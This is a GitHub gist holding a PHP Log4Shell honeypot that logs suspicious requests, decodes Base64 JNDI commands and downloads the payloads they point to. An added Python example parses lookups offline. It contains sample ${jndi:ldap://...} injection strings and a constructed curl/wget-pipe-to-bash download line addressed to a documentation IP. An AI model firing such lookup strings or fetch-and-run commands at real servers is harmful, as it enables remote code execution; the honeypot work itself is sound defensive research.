@ltoinel
Created December 20, 2021 23:16
A Simple Log4Shell HoneyPot
<?php
# Fake Java HTTP server headers
header("Server: WildFly/8", true);
header("X-Powered-By: Undertow/1", true);

/**
 * A Simple Attack logger
 */
function log_attack($log_msg)
{
    $log_filename = "data/" . date('Y-m-d');
    if (!file_exists($log_filename)) {
        // Create one directory per day for the attack logs.
        mkdir($log_filename, 0777, true);
    }
    $log_file_data = $log_filename . '/' . $_SERVER['REMOTE_ADDR'] . '.txt';
    // Append the content to the per-source-address file.
    file_put_contents($log_file_data, $log_msg . "\n", FILE_APPEND);
}

// We merge the SERVER and REQUEST arrays into one.
$data = array_merge($_SERVER, $_REQUEST);
$attack = false;

// We try to find a dollar in the different values, which can be a sign of a Log4Shell attack.
foreach ($data as $key => $value) {
    // Request parameters can be arrays (e.g. ?a[]=1); strpos() needs a string.
    if (!is_string($value)) {
        continue;
    }
    // We found a dollar in an HTTP header or request value.
    if (strpos($value, '$') !== FALSE) {
        $attack = true;
        log_attack($_SERVER['REMOTE_ADDR'] . ":" . $key . ":" . print_r($value, true));
        // Check for a Base64 command.
        $pointer = strpos($value, "Base64");
        // The JNDI lookup contains a Base64 command.
        if ($pointer !== FALSE) {
            // We extract the base64 encoded command: it starts after "Base64/"
            // and ends at the closing brace of the lookup (or at end of string).
            $start = $pointer + 7;
            $end = strpos($value, "}", $start);
            $basic64 = substr($value, $start, ($end === FALSE ? strlen($value) : $end) - $start);
            // We decode the shell command and log it.
            $command = base64_decode($basic64);
            log_attack($_SERVER['REMOTE_ADDR'] . ":" . $command);
            // We split the shell command into unique instructions for analysis.
            $command = str_replace(array("(", ")"), "", $command);
            $command = str_replace("||", "|", $command);
            $instructions = explode('|', $command);
            // We check each instruction to detect if it's a curl or wget command.
            foreach ($instructions as $instruction) {
                // If it's a curl or wget command.
                if (strpos($instruction, "curl") !== FALSE || strpos($instruction, "wget") !== FALSE) {
                    // We extract all args of the shell instruction; the URL is taken as the last one.
                    $args = explode(" ", trim($instruction));
                    $url = end($args);
                    // Create curl resource.
                    $ch = curl_init();
                    // Set target url.
                    curl_setopt($ch, CURLOPT_URL, $url);
                    // Return the transfer as a string.
                    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
                    // Do not let the honeypot hang on an unresponsive server.
                    curl_setopt($ch, CURLOPT_TIMEOUT, 10);
                    // Download the payload from the attacker's server.
                    $script = curl_exec($ch);
                    // We save it for analysis.
                    log_attack("PAYLOAD:$url=" . $script);
                    // Close curl resource to free up system resources.
                    curl_close($ch);
                }
            }
        }
    }
}
?>
<html>
<head>
<title>Welcome</title>
</head>
<body>
<pre>
<?php
if ($attack){
?>
________________
____/ ( ( ) ) \___
/( ( ( ) _ )) ) )\
(( ( )( ) ) ( ) )
((/ ( _( ) ( _) ) ( () ) )
( ( ( (_) (( ( ) .((_ ) . )_
( ( ) ( ( ) ) ) . ) ( )
( ( ( ( ) ( _ ( _) ). ) . ) ) ( )
( ( ( ) ( ) ( )) ) _)( ) ) )
( ( ( \ ) ( (_ ( ) ( ) ) ) ) )) ( )
( ( ( ( (_ ( ) ( _ ) ) ( ) ) )
( ( ( ( ( ) (_ ) ) ) _) ) _( ( )
(( ( )( ( _ ) _) _(_ ( (_ )
(_((__(_(__(( ( ( | ) ) ) )_))__))_)___)
((__) \\||lll|l||/// \_))
( /(/ ( ) ) )\ )
( ( ( ( | | ) ) )\ )
( /(| / ( )) ) ) )) )
( ( ((((_(|)_))))) )
( ||\(|(|)|/|| )
( |(||(||)|||| )
( //|/l|||)|\\ \ )
(/ / // /|//||||\\ \ \ \ _)
<?php
} else {
?>
:::: :::::: :::: :::: :::::::::
:::: :::: :::: :::: :::: :::::::::
:::: :::: :::: :::: :::: ::::
:::: :::: :::: :::: :::: ::::::::
:::: :::: :::: :::: :::: ::::
:::: :::: :::: :::::::: ::::
:::::::::: :::: :::: :::::: :::::::::
:::::::::: :::::: :::: :::::::::
<?php
}
?>
</pre>
</body>
</html>
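As an added example, not part of the gist above, here is the honeypot's payload-parsing step reimplemented in Python for offline analysis of captured request fields, and generalized beyond what the gist does: it matches `${jndi:...}` lookups explicitly instead of flagging every `$` (so a value like `price=$10` is not reported), splits the lookup into scheme, host, port and path, decodes the `/Base64/` segment while tolerating missing padding, handles array-valued parameters (the case where PHP's `$_REQUEST` hands back an array), and lists the URLs used by curl/wget stages. Unlike the honeypot, it only records those URLs and never fetches them. The `SAMPLE_FIELDS` request and the 203.0.113.10 address are constructed for the example (RFC 5737 documentation range), not observed traffic.

```python
import base64
import binascii
import re
from urllib.parse import urlsplit

# A JNDI lookup such as ${jndi:ldap://host:1389/path}; the body runs up to the closing brace.
JNDI_RE = re.compile(r"\$\{jndi:(?P<scheme>[a-z]+)://(?P<rest>[^}]+)\}", re.IGNORECASE)
# The ".../Base64/<b64>" path convention that the honeypot slices out with substr().
B64_PATH_RE = re.compile(r"/Base64/(?P<b64>[A-Za-z0-9+/=]+)", re.IGNORECASE)
URL_RE = re.compile(r"https?://[^\s'\"]+")


def decode_command(b64):
    """Decode the Base64 segment, adding missing padding; None if it is not valid Base64 text."""
    padded = b64 + "=" * (-len(b64) % 4)
    try:
        text = base64.b64decode(padded, validate=True).decode("utf-8")
    except (binascii.Error, ValueError, UnicodeDecodeError):
        return None
    return text if all(ch.isprintable() or ch in "\n\t" for ch in text) else None


def split_instructions(command):
    """Split a shell one-liner into stages the way the honeypot does: drop parentheses, treat || like |."""
    stripped = command.replace("(", "").replace(")", "").replace("||", "|")
    return [stage.strip() for stage in stripped.split("|") if stage.strip()]


def fetch_urls(command):
    """URLs handed to curl/wget stages, found by regex rather than 'last argument' so option order does not matter."""
    urls = []
    for stage in split_instructions(command):
        tokens = stage.split()
        if not tokens:
            continue
        if tokens[0].rsplit("/", 1)[-1] in ("curl", "wget"):
            for url in URL_RE.findall(stage):
                if url not in urls:
                    urls.append(url)
    return urls


def extract_lookups(fields):
    """One record per JNDI lookup in the request fields (name -> str, or list of str for repeated parameters)."""
    records = []
    for name, value in fields.items():
        values = value if isinstance(value, (list, tuple)) else [value]
        for v in values:
            if not isinstance(v, str):
                continue
            for m in JNDI_RE.finditer(v):
                scheme = m.group("scheme").lower()
                parts = urlsplit(f"{scheme}://{m.group('rest')}")
                try:
                    port = parts.port
                except ValueError:  # non-numeric port in the lookup
                    port = None
                rec = {"field": name, "scheme": scheme, "host": parts.hostname,
                       "port": port, "path": parts.path, "command": None, "fetch_urls": []}
                b = B64_PATH_RE.search(parts.path)
                if b:
                    rec["command"] = decode_command(b.group("b64"))
                    if rec["command"]:
                        rec["fetch_urls"] = fetch_urls(rec["command"])
                records.append(rec)
    return records


# Constructed sample request fields (documentation address 203.0.113.10, not a real observation).
SAMPLE_COMMAND = "(curl -s http://203.0.113.10/x.sh||wget -q -O- http://203.0.113.10/x.sh)|bash"
SAMPLE_B64 = base64.b64encode(SAMPLE_COMMAND.encode()).decode().rstrip("=")  # padding often omitted
SAMPLE_FIELDS = {
    "HTTP_USER_AGENT": "${jndi:ldap://203.0.113.10:1389/Basic/Command/Base64/" + SAMPLE_B64 + "}",
    "HTTP_X_FORWARDED_FOR": "${jndi:rmi://203.0.113.10:1099/o}",
    "q": ["price=$10", "plain"],  # array-valued parameter; the bare '$' is not a lookup
    "HTTP_ACCEPT": "*/*",
}

if __name__ == "__main__":
    for rec in extract_lookups(SAMPLE_FIELDS):
        print(rec)
```

The `fetch_urls` list is the equivalent of the `$url` the honeypot passes to curl; keeping it as data lets an analyst decide separately whether and from where a payload should be retrieved.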
@Boydidy
Boydidy commented May 3, 2022

Very cool, your honeypot
